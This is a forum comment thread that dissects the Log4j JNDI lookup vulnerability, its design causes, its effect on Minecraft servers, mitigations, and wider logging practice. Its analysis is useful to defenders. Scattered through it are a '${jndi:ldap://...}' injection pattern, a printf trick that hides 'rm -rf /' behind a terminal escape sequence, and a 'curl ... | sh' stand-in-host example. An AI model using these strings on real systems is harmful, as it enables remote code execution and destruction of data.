To folks wondering what the issue is about, I'll give a short summary that I myself needed.
Typically a logging library has one job to do: swallow the string as if it's some black box and spit it elsewhere as per provided configurations. Log4j though, doesn't treat strings as black boxes. It inspects its contents and checks if it contains any "variables" that need to be resolved before spitting out.
Now there's a bunch of ways to interpolate "variables" into log content. For example something like "Logging from ${java:vm}" will print "Logging from Oracle JVM". I'm not sure but you get the idea.
One way to resolve a variable using a custom Java resolver is by looking it up through a remote class hosted in some LDAP server, say "${jndi:ldap://someremoteclass}" (I'm still not quite sure why LDAP comes into the picture). Turns out, by including "." in some part of the URL to this remote class, Log4j lets off its guard & simply looks up to that server and dynamically loads the class file.
The fix has introduced ways to configure an allowed set of hosts/protocols/etc and forces Log4j to go through this configuration such that these dynamic resolutions don't land on an random/evil server.
That's stunning. People are screaming about SQL injections and such for decades now, every "programming 101 for complete doofuses" course has a chapter about it in the first ten pages, we have tools upon tools to detect patterns of using untrusted data as control... And yet, one of the most popular logging toolkits in one of the most popular languages has it built in as a feature - literally using untrusted and unfiltered outside data as a pattern - and it takes until 2021 (almost 2022, happy new year!) to realize this is bad??? There were so many problems with untrusted data used as control flow, how it didn't raise any alarms before?
I mean it's so inexplicably bad that it's hard to imagine it being an innocent mistake.
You have to wonder if opening a ticket for such a feature then having someone (or yourself under another account) build it in such an egregious way is a possible vector for deliberately creating such exploits.
If this feature was default enabled, then it's even more suspect. It's just such an esoteric thing.
When you factor in this kind of thing with recent revelations about backdoored NPM packages, you have to wonder if OSS is even tenable. I don't want to go all the sky is falling here, But the default model of assuming that someone's paying attention doesn't seem to cut it. It works well in most cases, but it's that 2% or 5% that's a doozy.
OSS definitely has a reliability and credibility problem on its hands. Codes of Conduct that prioritize belonging over, say, competence and truthfulness is not helping. We need more people like the old Linus that are more concerned with the quality of the artifact than increasing the size of a community
> We need more people like the old Linus that are more concerned with the quality of the artifact than increasing the size of a community
There is a difference between (a) maintaining high code quality and review standards and (b) yelling at people and/or degrading them.
With this in mind, think through the first-order and second-order effects that happen when toxic leadership behavior is allowed, tolerated, or encouraged in an open source project.
Toxic leadership in an open source project, all other things equal, harms the project and the people.
Of course, historically, there are cases where intelligent and committed people exhibit toxic behaviors -- but this is not a pattern of behavior for us to aspire to. Quite the opposite.
I understand that many people (including software developers) struggle in interpersonal interactions. I don't demonize people when they are unaware or lack the tools to treat others with respect. But these behaviors have huge negative effects, so it reasonable and beneficial to have fair, humane codes of conduct to mitigate such negative patterns of behavior.
I think we need fewer people that somehow manage to mangle logic to such a degree that they blame security vulnerabilities on the willingness of some project to state that it's generally preferred to treat each other with some respect.
Linus' insults were always cringeworthy. Sometimes they may have been justified, at other times they were just needlessly hurtful and revealed some sort of weakness on his part. In any case, he always had the power to say no with just that single word.
Log4J doesn't even have a code of conduct in its source tree, though I guess Apache probably has one. You'll get a free Log4j update if you find any instances of it having an impact on the project.
That is a pretty far out security assessment. You have the same exploits in commercial software, just security through obscurity helps because of far less usage.
Yeah, I kind of thought that too as I was typing it, but it's so egregiously bad that I couldn't get around that conclusion.
>You have the same exploits in commercial software
Sure, virtually all software is susceptible to exploit. But, if someone were sending unsanitized strings to a database, and without using query parameters, etc., then we would all agree that's inexcusable after all of these years of knowing better.
Sounds quite sensationalized and the other way round tbh. Nobody 10000 years ago would have imagined how far we’ve come nowadays as a whole, while stupidity would be more likely limited by the circumstances and conditions of the time.
wow it's like SQL injection but even when using user input as parameter it does not get sanitised. Really curious what was motivation for such behaviour.
That explains the jndi lookup, but not why variables are parsed when they are not part of the format string. That just asks for unexpected issues and exploits.
JNDI lookup in it self is not a problem, problem is that user input is not sanitised and can include templates which can have JNDI lookup in them. I would expect user input with {} template symbols to be escaped and not evaluated.
Maybe, but still this seems as vanity feature added because "It would be really convenient"... this wasn't something what was needed, but something what was added to make life of maybe 0.1% of users little bit easier. My guess is that most of users of Log4J2 don't even know that it is able to do such magic, and would be horrified knowing it.
IMHO Log library should log, not do some magic stuff.
The method responsible for variable substitution is here [1].
There are other lookup mechanisms, (didn't check them all) but they only retrieve environment/static values (this one [2] for example retrieves kubernetes attributes). I think the jndi one is the only one that load and execute code.
Edit : I think my understanding of the docs is incorrect so ignore the next paragraph
From the documentation [3], I have the impression that these variables should be evaluated only when loading the pattern layout configuration. But in reality they are also evaluated when formatting the final log message (log.info(...)).
I agree that the input should be sanitized but only if the formatting behavior is a bug and was not intentional.
One possible explanation for the current situation, is that developers assumed that all lookup mechanism will retrieve only static values (env variables for example).
And then another dev introduced the jndi lookup which execute code, but no one noticed the impact on the already existing behavior (evaluation variable when formatting the final msg).
> I agree that the input should be sanitized but only if the formatting behavior is a bug and was not intentional.
Non-pattern arguments should not do any substitution, because otherwise developers have to jump through hoops to output strings verbatim. You don’t want "Invalid identifier: '${<some valid log4j syntax>}'" to be turned into "Invalid identifier: '<the log4j replacement>'" when the actual invalid identifier (e.g. from user input) was the "${…}" syntax. I’m surprised that log4j behaves that way still after two decades.
Recursive replacement is somewhat of a WTF yes but not really in a causitive relationship ro this vulnerability, right? The main cause is the order in which ${} variables are evaluated. They are evaluated after substitution of `{}` in the format string, instead of before. That's the key behavior problem.
A simple rule such as "If you evaluate a placeholder of type `{}` you should stop evaluating further recursively" would maintain most of existing behavior while only removing vulnerable behavior.
> I agree that the input should be sanitized but only if the formatting behavior is a bug and was not intentional.
The behavior is fundamentally wrong as explained by layer8's comment and in the blog post jcheng linked. Apparently it was intentional, and to me that's a million times worse than if it were a bug that could just be fixed.
log4j is unsuitable for use in a way that many many people are suddenly discovering today. The log4j developers need to rethink this, and even if they do, log4j's users should still strongly consider switching to something else. Otherwise they need to audit the whole codebase for other surprising, broken, insecure design decisions not only in its present state but also on each update. I don't see how it's possible to trust the log4j developers' design sensibilities after this.
> Apparently it was intentional, and to me that's a million times worse than if it were a bug that could just be fixed.
I've been on an 'archaeological dig' into the Log4j commit history, and sure enough, there's evidence that the formatting behavior was intentional from the outset.
That's way worse than that - that's like SQL server looks into your data and if it sees something that looks like SQL it executes it right there. I wonder how it took until now to find an exploit...
Yup, log injection is something that I've been hearing a lot about recently, but I really only thought about it being able to affect systems that consume the logs. This approach is pretty ingenious.
The point is that the first argument is the format string. debug.log("{}", stuffIGotFromPeer) should generally be safe (this bug is an example of when it isn't, though)
The fact that the first argument is interpreted as a format string even when you aren't supplying format arguments is a violation of 'principle of least surprise'. The availability of format parameters that can access environment data - let alone remotely loaded code - is a feature most people won't discover unless they go looking for it.
How are varargs implemented in the JVM ABI? Is the called function even aware of how many parameters were actually passed, or does it have to rely on the format string for that?
The log4j API implements a few overloads of each log method to help avoid the implicit array allocation happening in common logging cases (no args, one arg, etc).
TBH, this is a huge antipattern. You have to put some context in your logs, so it must be something like "debug.log("Got from peer: {}", stuffIGotFromPeer) or something like that. You can't complain printf(stuffIGotFromPeer) is dangerous, so here is the same. But in log4j, debug.log("Got from peer: {}", stuffIGotFromPeer) is as unsafe as the other one, too! There's no way to make it safe, as I understand.
Fortunately (and for reasons I can't begin to understand), debug and info logging levels seem to be safe, but error is not. Technically better, but somehow... morally worse?
Because the string concatenation requires allocation of a new string, which will need to be garbage collected, regardless of whether or not the log.debug actually needs it.
Using a format and args lets you call the method with only references to existing objects, no additional string needs to be allocated unless the log method actually needs to generate the string to log (and it might even be able to use streaming to output the log and never even allocate the string)
When you’re doing things like putting trace logs with all your parameters in at the top of every method call, the memory and GC pressure of generating unnecessary strings can be significant.
The first argument is code and the rest of the arguments are data, much like an SQL statement and its parameters. You could try to prove that whatever interprets the code in the first argument will never do anything dangerous no matter what it's supplied with, but then someone might add that dangerous feature later, as happened in this case.
To make it always work correctly, don't pass the data values as code. Although apparently[1] Log4j complicates this by mixing code with data even if you separate them, unless you tell it not to by saying "$m{nolookups}" instead of "%m".
No. I don’t think anybody generally expects log message parameterization to do anything like escaping or white space normalization or anything to the parameters that wouldn’t also be done to the message string.
If you are using a logger to output a message which you want to be able to parse based on delimiters, say, it would be up to you to escape any parameters you were incorporating into it to ensure they don’t confuse your parser.
Generally, most logging frameworks have two parts, the format string, and the parameters. A good logging library will also avoid calling str()/toString() if the log isn't emitted (for example, if it's a debug log but minimum level is info).
You have something similar when building database queries, generally you should have a base template into which you insert arguments. The library generally should take care of escaping things and also preventing things like SQL injections.
Even the variable interpolation is a security risk.
If I have the ability to trigger execution of a process on some service, and one of the things it does is return me the logs form that process, it might be somewhat surprising to the host of that process that if I can pass in "${java:vm}" as input, the logs might leak information about what version of the JVM it's running...
What else might you be able to get a system to leak to you if you can control input and read log output?
I agree. It reminds me a lot of XXE attacks on XML. You wouldn't expect parsing an XML file to open arbitrary network connections, would you? The spec says an XML parser should do that. A lot of parsers used to have that feature turned on by default, although I think by now most folks have wised up.
I'm not defending Log4j, but this error can really happen to many logging libraries.
All logging libraries contain some kind of template engine as a performance optimization, in order to avoid actually generating the output string (can be costly) if logging is disabled. And template engines have always been a major source of vulnerabilities.
Apparently, from recent posts on this page, the problem is not solely caused by the fact that log4j perform some substitutions from a preset map, but that it performs substitution recursively, thus interpreting again the data injected into the string, with apparently no way to escape it, which I think very few logging libraries are doing.
Imagine, you write SQL commands using the proper parametric form, such as:
> exec("select * where id=${1}", user_provided_login);
You would be right to expect the DB library to escape the string so that no SQL injection is possible. After all, isn't that the whole point of parameters over a mere
> exec('select * where id=' + user_provided_login);
?
Well, apparently log4j is doing the equivalent of treating 'user_provided_login' as legit SQL.
This is especially problematic because not only will it substitute some '${variables}' again at remote user discretion, but some '${special.forms}' can actually instruct log4j to connect anywhere, download some code, execute it, then print the output. Because that was deamed convenient to someone in the past who complained that feature was missing and submitted a patch which, because of stellar unit tests, passed the code review.
The only context I can think of where this behavior regarding recursive substitution is acceptable is text templating, away from possibly adversarial input. I believe it goes opposite to expectations when logging.
> You would be right to expect the DB library to escape the string so that no SQL injection is possible.
SQL in some (hopefully good number of) cases is much safer than that. Going with MySQL prepared statements here: parameters are not sustituted into the SQL statement string, but rather sent as seperate data packets in the wire protocol.
Eliding the string interpolation doesn’t necessarily have to be a feature of the logging library, the language itself can have affordances for this.
For example in swift, log.debug("my name is \(expensiveCalculate(name))") doesn’t have to evaluate “expensiveCalculate(name)” unless the logger actually opts to instantiate the string (which it can skip if say, debug logging is disabled.) This is because Swift’s string interpolation is implemented as lazily-evaluated closures, and all the “debug” method has to do is tag the input as an @autoclosure and it can avoid evaluation until it actually calls the closure. No templating is needed, just native string interpolation provided by the language.
> All logging libraries contain some kind of template engine as a performance optimization
This doesn't need to be the case for some languages. But also, a language's native string interpolation doesn't need to be implemented as any sort of runtime template engine in the first place, because the compiler can compose the the components of the interpolated string at compile time. This compile-time/runtime split is IMO the key differentiator here, because runtime string interpolation is much more prone to bugs/RCE (since an untrusted string may show up as your template string.)
To use an example, in swift, `f1("Some \(string) with \(vars)")` is fundamentally different than calling `f2("Some {} with {}", string, vars)`, because of the fact that such a method signature for "f2" may allow an untrusted string to show up as the first argument, which isn't possible in f1. (And no, an external string that happens to have \()'s in it will not be expanded... it has to be a string literal in the source code, which the compiler can see, for interpolation to happen.)
While nice this feature doesn't really exist in other programming languages that don't involve the caller unergonomically wrapping the parameter to defer evaluation.
There are several ways to avoid generating log strings that don't involve sketchy ad-hoc templating. Use a language with laziness, put the string generation in a lambda expression, use a language with a good compiler and don't put side effects in your log string expression, etc.
As a matter of principle, it should also clearly not be possible for a templating engine to perform any kind of side effect. That's totally crazy.
I think you’re right but also showing where a more secure design could solve it just like we’ve seen for SQL injection. The problem is that the first parameter can either be a format string or data.
If the signature was different so it only used instances of a FormatString class to get dynamic behavior, this problem would be avoided, but I’m sure a lot of people would complain about the extra typing.
What’d be really cool would be if Java supported something like this Rust lifetime hack to let that be implicit where you could disable dynamic functionality for strings created after startup.
Would you be ok with logging also checking the contents of what is passed in for sensitive data that should not be logged? (I do this and am curious if there’s a better pattern, to provide defense in depth against mistakenly logging eg secrets)
> Turns out, by including "." in some part of the URL to this remote class, Log4j lets off its guard & simply looks up to that server and dynamically loads the class file.
Unless i am mistaken, i don't believe the attack as described by LunaSec actually works against a default-configured JVM released any time in the last decade.
This is my understanding of it as well. While the bug is still bad due to the fact that a JVM instance will connect to the attacker's endpoint, any JVM above 8u121 wouldn't execute the code with Java's default configuration.
This exploit is quite severe on Minecraft Java Edition. Anyone can send a chat message which exploits everyone on the server and the server itself, because every chat message is logged. It's been quite a rollercoaster over the past few hours, working out the details of how to protect members of servers, and informing players (many of whom uses modded clients that don't receive the automatic Mojang patches) of how to protect themselves. Some of the major servers like 2b2t and Mineplex have shut down, and larger servers that haven't shut down yet are pure chaos right now.
> Anyone can send a chat message which exploits everyone on the server and the server itself, because every chat message is logged. ... Some of the major servers like 2b2t and Mineplex have shut down, and larger servers that haven't shut down yet are pure chaos right now.
Why does this behavior remind me of the old "dcc send start keylogger 0 0 0" exploit of IRC some fifteen years ago?
> DCC SEND STARTKEYLOGGER 0 0 0 is a way to make half of the people in an irc channel disconnect. This originated when a virus used the phrase to start the key logger it came with. If you had Norton internet security, it would terminate the connection. Some older routers also crash when receiving a malformed DCC request, which DCC SEND STARTKEYLOGGER 0 0 0 is.
That's pretty wild, it was caused by hypervigilant security software apparently
> The vanilla launcher will automatically patch 1.12 to 1.18
The patch seems to have been to the client-1.12.xml file, which I believe is the log4j configuration file for all client releases since 1.12, and the change seems to have been to add a {nolookups} flag to the log format (but I don't have an old copy of that file to compare and see if anything else was changed).
If I'm not wrong, this gives a simple way to make sure your copy of Minecraft is patched: just check if that file has that {nolookups} flag.
Thanks, this is the first message where I see the full instruction on where and how to apply the workaround. I was not even sure if this is something I should change in the third-party code that I run in a Docker container, and now I know it is just a change of the ENTRYPOINT or CMD line.
Wouldn't this be a breakthrough for the any% glitched category? You could just load + inject a class that makes you win instantly with only one chat message! <T C-V enter> speedstrat ftw. :)
On one hand I want to be more forgiving of this, because log4j is very old, and likely this feature was introduced well before we all had a collective understanding of how fiddly and difficult security can be, and how attackers will go to extreme effort to compromise our services.
But at the same time... c'mon. A logging framework's job is to ship strings to stdout or files or something. String interpolation should not be this complicated, flexible, whatever you want to call it. The idea that a logging framework (!) could even have an RCE makes me want to scream... the feature set that leads us to that even being possible just weeps "overengineered".
How do you differentiate between "actually abandoned and probably dangerous" and "actively maintained, but updated only very rarely, because there's nothing left to do"?
By reputation, adoption, type of changes being made (e.g. "implemented correct alphabetical ordering with proper normalization" is less mature than "updated to latest Unicode standard, Cypro-Minoan is now allowed"), update schedules (e.g. once or twice a year right after someone opens an infrequent issue vs. once or twice a year during the maintainer's vacations), type of issues that remain open (e.g. "crashes if the description is too long", answer "use a shorter description", is less mature than "bad-looking text wrapping if the description is too long", answer "default column widths are compact, but you can customize them").
Code is alive and there’s typically always something to do: adding tests, removing bugs, or simply paying back technical debt. If you go a full year without any releasable changes, chances are the project has been abandoned.
Why would you paid back technical debt on something where you don't intend to add features into or don't have serious bugs?
This idea that it must be changing forever is literally why you can't have simple done tools. Cause they will be considered abandoned once they do that one thing.
So that changes can be more readily introduced when they need to be. When the next CVE comes out, you want to be able to respond to it quickly and produce a fix.
No one said the interface or functionality has to be changing forever; as I said, work includes testing and refactors, and that includes removing code. Or just fixing known bugs. I don’t know many open source projects with zero bugs, do you?
If it’s a useful library, you want to be more and more certain it doesn’t have bugs, so yes, you keep adding tests. Maybe you stop when it’s clear that the library is perfect. But when has any project reached that state?
If it’s too small though, it’s probably not that useful and this doesn’t apply. It doesn’t really make sense to care about whether it was abandoned, either, because it will be so small that it doesn’t have any onboarding time and anyone can pick it up at any time.
My goal is to write servers that get uptimes more than a year. Like the old saying, peefection is reached not shem there is nothing left to add but nothing left to delete.
Cause these libraries depend on other libraries that are probably extremely out of date at that point and have their own security vulnerabilities.
An example of a project that hasn't been dismissed as "abandoned", is https://github.com/patrickmn/go-cache because it explicitly doesnt have dependencies.
So yeah, if you have a semi-complex library, a year without a release is abandoned.
No, this is about log4j2 which is kinda new (2.0.0 was released 2014). Otherwise, yeah, this is terrible, especially since the tag doesn't even have to be in the formatting string.
The sample in the in post is log4j1 ("org.apache.log4j" rather than "org.apache.logging.log4j"), which is why it's using:
> log.info("foo: " + bar);
rather than:
> log.info("foo: {}", bar);
But the issue also affects log4j2, and it doesn't matter which form of logging you use, since the transformation apparently happens further along in some appender, used by both versions of log4j.
The post has been partially updated to log4j2 [0] (the import is still log4j1, but I imagine this will be updated soon [1]).
And yes, I'm actually not sure log4j1 is vulnerable. I assumed it was because the sample code in the post was using log4j1, though the description only explicitly mentions log4j2.
Nah it's long gone, however I've later read that the 1.2 series was declared deprecated long ago and after that there was an exploit for 1.2 released in 2019, not entirely sure if it was ever patched so that might've been the source.
Yeah this is disappointing to hear about and isn't a good look for the people involved. At the very least it should've been a separate module or an opt-in configuration parameter, who the hell needs a JNDI lookup in a log statement. If you do, do it yourself then log it. Disappointing.
Ok, I think we can change the URL to that from the submitted URL (https://github.com/apache/logging-log4j2/pull/608), which doesn't provide much (any?) context for understanding what's being fixed there.
Note that the formatMsgNoLookups workaround only applies to recent versions of the log4j library, while it's still unclear how far back this bug may stretch. Other options for patching are detailed in the thread: https://github.com/apache/logging-log4j2/pull/608#issuecomme... mentions that just removing the class providing the vulnerable behavior works well, and https://github.com/Glavo/log4j-patch is a JAR that you can add to your classpath to simply override the same class.
The 'formatMsgNoLookups' property was added in version 2.10.0, per the JIRA Issue LOG4J2-2109 [1] that proposed it. Therefore the 'formatMsgNoLookups=true' mitigation strategy is available in version 2.10.0 and higher, but is no longer necessary with version 2.15.0, because it then becomes the default behavior [2][3].
If you are using a version older than 2.10.0 and cannot upgrade, your mitigation choices are:
- Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application's or stack's classloading documentation to understand this behavior.
Confirming that this is correct: the {nolookups} option was added in v2.7 as a result of LOG4J2-905, so this mitigation is not available on versions prior to 2.7. Corroborating sources:
Checking on the viability of the classloading-based mitigations now across the versions. It seems that LOG4J-1051 was raised [6] to make the class instantiator more tolerant of missing classes, and the resulting changes were released in v2.4 and v2.7. Will check how earlier versions behave in this case.
Thank you for this super clear and concise write-up. Used it to write up these instructions for our users and customers to patch the vulnerability across their codebase and sharing here in case it's of use/interest to others: https://twitter.com/beyang/status/1469171471784329219.
So a lot of people sound mad that the logging library is parsing the inputs, and maybe they should be, but the truly paranoid should also be aware that your terminal also parses every byte given to it (to find in-band signalling for colors, window titles, where the cursor should be, etc.). This means that if a malicious user can control log lines, they can also hide stuff if you're looking at the logs in a terminal. Something to be aware of!
While that's an interesting vector for attack, is it realistically an issue? Terminals are run as root all the time. I would guess any mainstream ones are well reviewed to not have such exploits work. Are you aware of any actual attacks exploiting terminal parsing in the wild?
Classic confusion: terminals typically run as users, but the shells in them often run as root.
I could imagine an attack like this:
printf 'rm -rf /\n\033[%iAecho "Hello World!"\n'
When executed in a terminal this looks like it generates an innocent shell script. But when piped into a file and the executed it will delete all your files.
Is it really common to run terminals as root? I can't remember the last time I did. Sure, I open a terminal as my user, and then run 'sudo bash' to get a shell as root, but the terminal is still running as my user. Were you meaning something else?
I've been on Linux since 2000s and still maintain the view that real men log in as root on tty1. It's ironman mode, and pure joy of *nix as it was meant to be experienced. You filthy casual. /s
I'd be wary of the assumption that mainstream terminals are well reviewed. I'd think terminal software are one of those less glamorous software that doesn't get any attention at all.
similarly to shells and base/foundational software (like logging libraries).
There are terminal control codes (status reports) that cause the terminal to send characters. However it looks like the format won't be very useful for RCE. Some of the codes like the cursor position are controllable by sending other control codes first, but you can't set the cursor position to "curl pwn.z0rd | sh"
Noone should be running a terminal as root if it can be avoided. Best practise would be to run the terminal as your user and sudo individual commands as needed. Assuming the command had untrusted output (eg `sudo tail -100F <some log with hostile info>`) the output would still be in your terminal. Any exploit would then need to be in "tail" (because that's the thing in this example you're running as root) or would need to be coupled with a priviledge escalation to get root.
This is the kind of vulnerability the GP was talking about here I think https://nvd.nist.gov/vuln/detail/CVE-2021-27135 and there have been a few in the history of terminals. If you've looked at the code for the historical terms (xterm, rxvt etc) it's very large and kinda gnarly. If you're security or performance-conscious there are probably better choices nowdays (eg Alacritty which I primarily use) which have a much smaller attack surface.
I don't get what the point of this feature even is. What is a legitimate reason for a logging library to make network requests based on the contents of what is being logged? And is this enabled out-of-the-box with log4j2?
> I don't get what the point of this feature even is.
This is basically the response to every type of vulnerability that is based on some spec nobody's read. Same deal with XML entity parsing. Why should it make web requests, FTP requests, etc.?
At some point someone had it as a requirement and everyone else gets to live with it.
Hahaha, giving you an upvote because new vulnerabilities have, in fact, been found. (And I think one of them relates to this new code not being sufficient? Though I'm not following much anymore.)
There are two bizarre design decisions that combined into this stunning security vulnerability: the automatic trust-the-world code execution (on by default) and the recursive parameter expansion (always on). They flipped the default on the former. They haven't done anything about the latter, AFAIK. I wonder if they will.
The problem here is the JNDI lookup because for historical reasons there is code in these providers which causes Java to deserialize and load bytecode if it's found in a result for a lookup against an LDAP server. That exploit was partially fixed in the JDK in 2008, then in 2018, but there are multiple naming providers that are affected.
Yes, it's enabled by default before 2.15.0, released today to mitigate this issue.
I don’t understand these Java protocols enough to understand why was loading arbitrary bytecode from URLs even considered a feature, but I guess it was the 90s and Objects were all the rage
A lot of libs for logging have similar convenient ways for getting usernames and so on. The error here seems to be that even though you use the lib correctly a bug was introduced that made the injected parameters a part of the layout, at least that is what people are claiming. The example from the article though is an incorrect use of the lib and one can expect the same type of issues in a lot of libs when dealing with input parameters.
LDAP is typically a behind-the-firewall protocol. At that point, in the "old school" mindset, it's considered a trusted service. Having features to automatically pick up stuff across your own network of boxes might be considered useful by many an admin.
Also, my understanding is that Java deserialization (or deserialization in general) wasn't intended to explicitly allow actual code execution, just reconstitution of an object's state from storage on disk, the network, etc. Sometimes the state of certain types of object can be repurposed to result in arbitrary code execution, but AFAIK that wasn't an anticipated outcome or design goal back in the 90s.
I'm guessing some sort of auditing or routing functionality. For instance, you have debug logs going to some development server and login events going to so audit server.
I don't have experience with this feature but there's similar use cases in log shipping utilities like fluentd
Edit: I read the other link and it looks like some sort of poorly designed RPC functionality or something shrug
Reading about this got me to the words “servlet” and “BeanFactory”, which I don’t really want to uncover right now, as it might open some pandora’s box
> What is a legitimate reason for a logging library to make network requests based on the contents of what is being logged
I encountered a similar problem recently, my own logger can get the current container/pod IP address, it's painful to tell which host from the IPs in logs, so I had to do a manual DNS lookup to include a hostname instead. I was hoping the logger could automatically do a lookup and cache it for me.
Pretty sure the original rationale for this clusterfuck must have been something similar: “we only have user id here, but want the logs to contain user name”. Send this requirement to the cheapest bidder and here we are.
Why didn't write logs to stdout and scrape container log files by fluentbit/promtail/etc? I'm working on logging infrastructure now and really want to know the reason behind this(before I built it...)
So if you have a null pointer exception or something similar in production, you want to send that information to a remote host or alert system to be looked at urgently.
I might be missing something, but wouldn't the point be that it's not the log writer's responsibility to do this, but rather some other service that consumes the unparsed output and sends the notification?
I think 20 years ago it would have been slammed as overkill to have a separate process just to send logs.
Even now actually, there is a flurry of libs/gems to send events/logs/analytics to a remote server (Datadog, NewRelic, Slack…)from the application itself. It’s usually not directly coupled with the logger, but it’s not far.
Putting a feature in a logger to send logs remote is one thing. Putting a special syntax into the log message itself that gets parsed to decide where to send it is much weirder.
Exactly and this being enabled by default seems specially more unusual. I can understand config being parseable even though log configurer directly pulling a remote config is a stretch specially by default. But I don't think it's unlikely that people would by default assume that their log message would be parsed that way and as someone said it even works if that's used as a user input using {} instead of +.
syslog() has been around for a lot longer than 20 years, and that's a function that logs to a separate process. What's so bad about syslog that people need to invent new logging systems?
Encoding that in the log message itself still seems a bit crazy. I’m not familiar with log4j, but the .Net logging libraries I do know (NLog and Serilog) completely separate writing log events from processing (writing, sending, whatever) the events.
I believe the idea is that it lets you augment your log line with additional information to make it easier to read versus having to do the lookup at parse time.
I try to follow a rule with libraries: if a library causes more trouble than the implementation effort it would take to recreate its functionality from scratch (or rather, the portion of its funcitonality that is used in practice), then it's time to purge that library from projects and never use it again.
The part of log4j functionality that gets used in practice, most of the time, is just a wrapper around printf which adds a timestamp and a log-level. This is very quick and easy to write. A library in this role should have zero RCEs, ever in its entire lifetime, or it is unfit for purpose.
Log4j configuration isn't free either. Ask anyone who has ever been woken up by an asinine log rotation bug. (The tailer broke, or the rotation didn't happen... again, etc)
Playing application log janitor is miserable. Just ship the logs and be done with it.
I mean if you write log rotation code yourself you will still be woken up by it.
I agree that log configuration is a pain in the butt and oftentimes messy (especially when some third party lib includes a line to basically wipe your global config and everything gets wonky), but it's not like the heavy value adds are easy and bug-free to write!
I agree, writing (and arguably configuring) robust logging libraries isn't much fun, and not easy to do yourself.
So, don't. Ship the logs as quickly and as simply to a system which is explicitly for log management.
The choice isn't between writing huge logging libraries or using log4j, it's whether you want an application to handle its own flat-file logging and rotation in the first place.
Java has always been obnoxiously complex to steer towards sane, basic, modern syslog, which I think is a shame.
Logs are streams, not files. To a first approximation, you should just log to standard out, and let another system take care of sending your output to either a file (with rotation) or logstash, or syslog, or a whatever else is appropriate. To a second approximation (if you’re already using stdout for something else), the thing you’re logging to should still be a file descriptor, but not a file per se. (perhaps a local socket to a logging system like syslog.)
I don’t need everything on my system that logs, to invent its own log output directory, and implement its own log rotation. That’s how you get a mishmash of different places where logs end up living, and they become very difficult to collate or compare, etc.
Imo, the main point of a system like log4j or slf4j if the ability to have logging in your service up to the point of it being a massive performance impact - and keep it disabled.
For example, Hibernate has full query logging built in, but even if you filter locally with some logging demon, pushing 100 - 1k queries / second to stdout or a file is going to cripple performance.
With a logging framework like Log4J or SLF4J you can have this query logging, and you can enable it within 1 monitor run (usually 60s) at runtine and disable it 4-5 minutes later. This is very, very powerful in production.
Please not filebeat. For a few months I had this recurring problem where an app was logging way too much stuff. Filebeat dutifully accepted it and then created ghost files as a buffer which then filled up the disk and crashed the app.
Depending on the velocity at which the log barf was being produced, we sometimes had a short window in which we could manually (!) log in via SSH (!) and restart filebeat to force it to close the open file handles at the cost of losing everything being buffered locally (!).
> Of course if you're simply sending lines to the terminal in a simple program you don't need log4j
That's the issue though isn't it, a lot of people don't need those features, just the prettifying and formatting, levels selectable by classpath and basic bits. log4j is great at these things and has become the standard for these things as much as anything else.
And with a lot of stuff being done by microservices, serverless functions etc, you have other pieces that pick up the logs and do all the smart processing. Especially 'at scale'.
So a capable but simple logging library is probably a good option. Perhaps log4j could split.
You're better off learning the de-facto libraries of your language. Your employer, or any production application you're going to work on is probably going to use one of these libraries.
I learned the most common Java libraries when writing personal projects -- Lombok, log4j, Guava, Gson, Jackson, Netty, etc.
I had a significantly gentler learning curve at my first job. We used these common libraries, so I had a very easy time when I had to edit log filtering or fix log rotations of our applications.
Seems like you're disagreeing on the basis of personal development rather than whether it makes sense for any given project. I think at that point it depends on whether you're primarily coding to learn or to make software
Plenty of "roll your own x"s have critical security bugs too, they just don't make the front page of HN. Do you really think, in general, roll your own is safer?
You’re practically right,
But if your team isn't constantly changing then running your custom solution for at-least more simpler things like logging is better.
Because otherwise you have to depend on skills of a third party library maintainer you have no communication with or contract agreement with, to protect his/her codebase from getting security backdoors, which other malicious actors will constantly try to inject it with, if the library is known to be used by various large enterprises.
Coding with third party libraries is about trust, for simpler functions and packages its usually worth it long term to code it in-house. It’s easier to maintain, only comes with features you need and you’re always aware of what capabilities your code has.
I’m everyday impressed how relatively less npm with node, etc get hacked, considering they use additional third-party libraries for 4 liner functions too.
put in general terms, to minimize complexity, and to a lesser extent, increase control. I'm not saying it's always worth it to do that no matter what, but for smaller things like logging, if you don't have any hugely complex needs (i.e. it won't be much effort to maintain your own solution), I would personally always prefer an in-house solution. It's all a function of effort, of course.
java 5 - erm. java 1.4... and truth be told I'd prefer them over any other logging solution. Yet, java.util.logging has has quite a lot of vulnerabilities, itself.
avoid google libraries like the plague, there's absolutely no need for them unless you're using protobuf. I don't understand why people are using lombok after java 16. Jackson and log4j are sort of essential, unfortunately.
Log4j is not essential. There‘s slf4j as an abstraction layer and logback as native implementation for quite long time, supported by many libraries and frameworks.
For an enterprise to move to Java 16, a huge amount of code needs to be reviewed and tested. It's not as simple as incrementing a number in 200 pom.xml files.
Sure records are pretty cool but Lombok does do a few other things as well.
> The part of log4j functionality that gets used in practice, most of the time, is just a wrapper around printf which adds a timestamp and a log-level.
I... don't think this is true? When I was using it we used log rotation, log truncation, configurable output formatting that could be made consistent across the code or specialized in certain parts of the code base that required more detailed logging, masking credit card numbers and emails in log statements, and doing all of the logging async to not impact performance. And I'm sure there are features it has which I didn't mention.
I haven’t used log4j (or a JVM language) for several years but IIRC the most common usage was printf + agnostic but reliable output, commonly adapted to multiple SaaS solutions and usable in dev, and outputting formats that are searchable eg in Logstash. This is roughly the same as I’ve encountered on Node where I’ve also had to remind myself that it isn’t a simple printf -> stdout, even if it looks and feels like it is.
The complexity in logging libraries like this are much greater than they seem like they should be, specifically because they’re designed to abstract a lot of integration use cases in a way that feels like it just works. Marshaling data between even a few services introduces a lot of potential for mistakes.
For containers that's especially true because the best practice is just to write to stdout/stderr. This sidesteps a whole host of issues related to dealing with log files.
Even when you log to just stdout/stderr there are many features and considerations that are a lot more complicated than just printf (custom format patterns with context, dynamically turning logs on/off in parts of application, performance, ...).
I think there's a tradeoff. Your implementation is also likely to have vulnerabilities you haven't caught, but it would be more obscure and maybe people wouldn't bother as much finding exploits for it. On the other hand, using a popular commonly used library, it will get tested for vulnerabilities a lot more thoroughly, reported and eventually patched, so it is possibly more hardened.
I don't think so. If you write your own implementation, you'll limit the scope of what you write to stuff you're actually going to use, which isn't going to include crazy stuff like what log4j turned out to have lurking inside it.
Even trivial things can have vulnerabilities. You can always substitute Criteria API in JPA with concatenation of SQL, but one missed check and you will get SQL injection.
